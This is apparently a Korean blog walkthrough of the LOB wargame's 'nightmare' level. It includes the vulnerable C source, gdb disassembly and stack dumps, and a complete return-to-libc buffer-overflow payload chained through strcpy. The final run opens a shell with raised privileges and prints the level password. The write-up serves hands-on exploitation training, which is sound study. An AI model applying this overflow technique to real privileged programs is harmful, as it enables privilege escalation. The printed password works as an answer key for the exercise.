LOB Level 18 (succubus)

nightmare.c 소스 코드를 열어보겠음.

 

/*

        The Lord of the BOF : The Fellowship of the BOF

        - nightmare

        - PLT

*/

 

#include <stdio.h>

#include <stdlib.h>

#include <string.h>

#include <dumpcode.h>

 

main(int argc, char *argv[])

{

        char buffer[40];

        char *addr;

 

        if(argc < 2){

                printf("argv error\n");

                exit(0);

        }

 

        // check address

        addr = (char *)&strcpy;

        if(memcmp(argv[1]+44, &addr, 4) != 0){

                printf("You must fall in love with strcpy()\n");

                exit(0);

        }

 

        // overflow!

        strcpy(buffer, argv[1]);

        printf("%s\n", buffer);

 

        // dangerous waterfall

        memset(buffer+40+8, 'A', 4);

}

 

음.. check address 부분을 보면

strcpy 함수 주소를 리턴해야 한다고 나와 있다.

 

strcpy함수를 리턴하면 뭐하나.. 쓸데가 없는놈을..

그러면 생각해볼 수 있는게 RTL 체이닝이다.

연속적으로 RTL을 하는 것이다.

 

strcpy가 필수로 한번 나와야 하니까

RTL 체이닝 기법을 이용하여 한번더 호출해보자.

 

그럼 먼저 PPR 가젯을 찾아야 할 것이다. strcpy 인자가 2개니깐,

 

 [succubus@localhost succubus]$ objdump -d nightmare |grep "pop" -A3 |grep "ret" -B3

 80486b0:       5b                      pop    %ebx

 80486b1:       5e                      pop    %esi

 80486b2:       c9                      leave

 80486b3:       c3                      ret

 

 

ppr 가젯을 찾아봤는데 안나온다.

굳이 하자면 라이브러리 들어가서 offset값 구해서 이미지베이스값 더해서 ppr을 써도 되지만.

(LOB는 ASLR이 걸리지 않았으므로.)

 

일단 문제에서 요구하는 방향과 어긋난다고 판단하여 다른 방법을 생각해보았다.

strcpy함수를 왜 굳이 ret에 올리게 했을지를 생각해보자.

문자열을 복사하는 함수이다.

 

스택 버퍼에 시스템함수와 인자를 올리고 ret자리에 복사하는 식으로 하면 될 것같다.

페이로드는

[&SYSTEM] ["A"4] ["/bin/sh"] [NOP32] [&STRCPY] [NOP4] [&dest4] [&src4]

 

[succubus@localhost succubus]$ gdb -q nightmara

(gdb) set disassembly-flavor intel

(gdb) b *main+3

Breakpoint 1 at 0x80486b7

(gdb) r

Starting program: /home/succubus/nightmara

 

Breakpoint 1, 0x80486b7 in main ()

 

(gdb) print system

$2 = {<text variable, no debug info>} 0x40058ae0 <__libc_system>

 

system 주소를 구했다.

"/bin/sh" 주소는 재활용 한다.400fbff9​

 

strcpy 주소는 코드에 printf addr 을 추가해서 확인했다.

 

[succubus@localhost succubus]$ gdb -q nightmara

(gdb) set disassembly-flavor intel

(gdb) disas main

Dump of assembler code for function main:

0x80486b4 <main>:       push   %ebp

0x80486b5 <main+1>:     mov    %ebp,%esp

0x80486b7 <main+3>:     sub    %esp,44

0x80486ba <main+6>:     cmp    DWORD PTR [%ebp+8],1

0x80486be <main+10>:    jg     0x80486d7 <main+35>

0x80486c0 <main+12>:    push   0x80487db

0x80486c5 <main+17>:    call   0x80483e0 <printf>

0x80486ca <main+22>:    add    %esp,4

0x80486cd <main+25>:    push   0

0x80486cf <main+27>:    call   0x80483f0 <exit>

0x80486d4 <main+32>:    add    %esp,4

0x80486d7 <main+35>:    mov    DWORD PTR [%ebp-44],0x8048410

0x80486de <main+42>:    push   4

0x80486e0 <main+44>:    lea    %eax,[%ebp-44]

0x80486e3 <main+47>:    push   %eax

0x80486e4 <main+48>:    mov    %eax,DWORD PTR [%ebp+12]

0x80486e7 <main+51>:    add    %eax,4

0x80486ea <main+54>:    mov    %edx,DWORD PTR [%eax]

0x80486ec <main+56>:    add    %edx,44

0x80486ef <main+59>:    push   %edx

0x80486f0 <main+60>:    call   0x80483c0 <memcmp>

0x80486f5 <main+65>:    add    %esp,12

0x80486f8 <main+68>:    mov    %eax,%eax

0x80486fa <main+70>:    test   %eax,%eax

0x80486fc <main+72>:    je     0x8048715 <main+97>

0x80486fe <main+74>:    push   0x8048800

0x8048703 <main+79>:    call   0x80483e0 <printf>

0x8048708 <main+84>:    add    %esp,4

0x804870b <main+87>:    push   0

0x804870d <main+89>:    call   0x80483f0 <exit>

0x8048712 <main+94>:    add    %esp,4

0x8048715 <main+97>:    mov    %eax,DWORD PTR [%ebp+12]

0x8048718 <main+100>:   add    %eax,4

0x804871b <main+103>:   mov    %edx,DWORD PTR [%eax]

0x804871d <main+105>:   push   %edx

0x804871e <main+106>:   lea    %eax,[%ebp-40]

0x8048721 <main+109>:   push   %eax

---Type <return> to continue, or q <return> to quit---

0x8048722 <main+110>:   call   0x8048410 <strcpy>

0x8048727 <main+115>:   add    %esp,8

0x804872a <main+118>:   lea    %eax,[%ebp-40]

0x804872d <main+121>:   push   %eax

0x804872e <main+122>:   push   0x8048825

0x8048733 <main+127>:   call   0x80483e0 <printf>

0x8048738 <main+132>:   add    %esp,8

0x804873b <main+135>:   push   4

0x804873d <main+137>:   push   65

0x804873f <main+139>:   lea    %eax,[%ebp-40]

0x8048742 <main+142>:   lea    %edx,[%eax+48]

0x8048745 <main+145>:   push   %edx

0x8048746 <main+146>:   call   0x8048400 <memset>

0x804874b <main+151>:   add    %esp,12

0x804874e <main+154>:   leave

0x804874f <main+155>:   ret

End of assembler dump.

(gdb) b *strcpy

Breakpoint 4 at 0x8048410

(gdb) b *main+154

Breakpoint 5 at 0x804874e

(gdb) r `perl -e 'print "A"x44, "\x10\x84\x04\x08"'`

The program being debugged has been started already.

Start it from the beginning? (y or n) y

 

Starting program: /home/succubus/nightmara `perl -e 'print "A"x44, "\x10\x84\x04\x08"'`

Breakpoint 4 at 0x400767b0: file ../sysdeps/generic/strcpy.c, line 30.

 

Breakpoint 4, strcpy (dest=0x2 <Address 0x2 out of bounds>, src=0xbffffb24 "\034????)

    at ../sysdeps/generic/strcpy.c:30

30      ../sysdeps/generic/strcpy.c: No such file or directory.

(gdb) c

Continuing.

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA?

 

Breakpoint 5, 0x804874e in main ()

(gdb) x/50x $esp

0xbffffaac:     0x08048410      0x41414141      0x41414141      0x41414141

0xbffffabc:     0x41414141      0x41414141      0x41414141      0x41414141

0xbffffacc:     0x41414141      0x41414141      0x41414141      0x41414141

0xbffffadc:     0x08048410      0x41414141      0xbffffb24      0xbffffb30

0xbffffaec:     0x40013868      0x00000002      0x08048420      0x00000000

0xbffffafc:     0x08048441      0x080486b4      0x00000002      0xbffffb24

0xbffffb0c:     0x08048350      0x0804877c      0x4000ae60      0xbffffb1c

0xbffffb1c:     0x40013e90      0x00000002      0xbffffc1c      0xbffffc35

0xbffffb2c:     0x00000000      0xbffffc66      0xbffffc88      0xbffffc92

0xbffffb3c:     0xbffffca0      0xbffffcbf      0xbffffcd0      0xbffffce8

0xbffffb4c:     0xbffffd06      0xbffffd25      0xbffffd30      0xbffffd3e

0xbffffb5c:     0xbffffd82      0xbffffd96      0xbffffdab      0xbffffdbb

0xbffffb6c:     0xbffffdc9      0xbffffde9

 

​스택 시작 주소는 0xbffffab0 

ret 주소는 0xbffffadc 로 해서 해보자.

 

[succubus@localhost succubus]$ ./nightmare `perl -e 'print "\xe0\x8a\x05\x40","A"x4,"\xf9\xbf\x0f\x40","\x90"x32,"\x10\x84\x04\x08","\xA"x4,"\xe0\xfa\xff\xbf","\xb0\xfa\xff\xbf"'`

?@AAAA廈@릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱?

Segmentation fault

[succubus@localhost succubus]$ ./nightmare `perl -e 'print "\xe0\x8a\x05\x40","A"x4,"\xf9\xbf\x0f\x40","\x90"x32,"\x10\x84\x04\x08","\xA"x4,"\xe0\xfa\xff\xbf","\xb0\xfa\xff\xbf"'`

?@AAAA廈@릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱?

Segmentation fault

[succubus@localhost succubus]$ ./nightmara `perl -e 'print "\xe0\x8a\x05\x40","A"x4,"\xf9\xbf\x0f\x40","\x90"x32,"\x10\x84\x04\x08","\xA"x4,"\xe0\xfa\xff\xbf","\xb0\xfa\xff\xbf"'`

?@AAAA廈@릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱?

Segmentation fault (core dumped)

[succubus@localhost succubus]$ gdb -q nightmara core

Core was generated by `./nightmara ?@AAAA廈@릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱 猩???.

Program terminated with signal 11, Segmentation fault.

Reading symbols from /lib/libc.so.6...PuTTYdone.

Reading symbols from /lib/ld-linux.so.2...done.

#0  0x41414141 in ?? ()

(gdb) x/40x $esp-52

0xbffffab0:     0x40058ae0      0x41414141      0x400fbff9      0x90909090

0xbffffac0:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffad0:     0x90909090      0x90909090      0x4000ae60      0x90909090

0xbffffae0:     0x41414141      0xbffffb24      0xbffffb34      0x40013868

0xbffffaf0:     0x00000003      0x08048420      0x00000000      0x08048441

0xbffffb00:     0x080486b4      0x00000003      0xbffffb24      0x08048350

0xbffffb10:     0x0804877c      0x4000ae60      0xbffffb1c      0x40013e90

0xbffffb20:     0x00000003      0xbffffc65      0xbffffc78      0xbffffc90

0xbffffb30:     0xbffffcaf      0xbffffcd1      0xbffffcdf      0xbffffea2

0xbffffb40:     0xbffffec1      0xbffffedf      0xbffffef4      0xbfffff14

(gdb) x/x  0x4000ae60

0x4000ae60 <_dl_fini>:  0x83e58955

(gdb) x/s 0x4000ae60

0x4000ae60 <_dl_fini>:   "U\211?203?004WVS?

(gdb) quit

[succubus@localhost succubus]$ ./nightmare `perl -e 'print "\xe0\x8a\x05\x40","A"x4,"\xf9\xbf\x0f\x40","\x90"x32,"\x10\x84\x04\x08","\xA"x4,"\xd0\xfa\xff\xbf","\xa0\xfa\xff\xbf"'`

?@AAAA廈@릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱?

Segmentation fault

[succubus@localhost succubus]$ ./nightmare `perl -e 'print "\xe0\x8a\x05\x40","A"x4,"\xf9\xbf\x0f\x40","\x90"x32,"\x10\x84\x04\x08","\xA"x4,"\xe0\xfa\xff\xbf","\xb0\xfa\xff\xbf"'`

?@AAAA廈@릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱?

Segmentation fault

[succubus@localhost succubus]$ ./nightmare `perl -e 'print "\xe0\x8a\x05\x40","A"x4,"\xf9\xbf\x0f\x40","\x90"x32,"\x10\x84\x04\x08","\xA"x4,"\xf0\xfa\xff\xbf","\xc0\xfa\xff\xbf"'`

?@AAAA廈@릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱?

Segmentation fault

[succubus@localhost succubus]$ ./nightmare `perl -e 'print "\xe0\x8a\x05\x40","A"x4,"\xf9\xbf\x0f\x40","\x90"x32,"\x10\x84\x04\x08","\xA"x4,"\xe0\xfa\xff\xbf","\xb0\xfa\xff\xbf"'`

?@AAAA廈@릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱?

Segmentation fault

 

주소 제대로 찾았는데 "A"x4 를 "\xA"x4 라고 해서 세그먼트 폴트가 자꾸떴다.. (이런 멍청한..)

 

[succubus@localhost succubus]$ ./nightmare `perl -e 'print "\xe0\x8a\x05\x40","A"x4,"\xf9\xbf\x0f\x40","\x90"x32,"\x10\x84\x04\x08","A"x4,"\xe0\xfa\xff\xbf","\xb0\xfa\xff\xbf"'`

?@AAAA廈@릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱AAAA猩???

bash$ id

uid=517(succubus) gid=517(succubus) euid=518(nightmare) egid=518(nightmare) groups=517(succubus)

bash$ my-pass

euid = 518

beg for me

bash$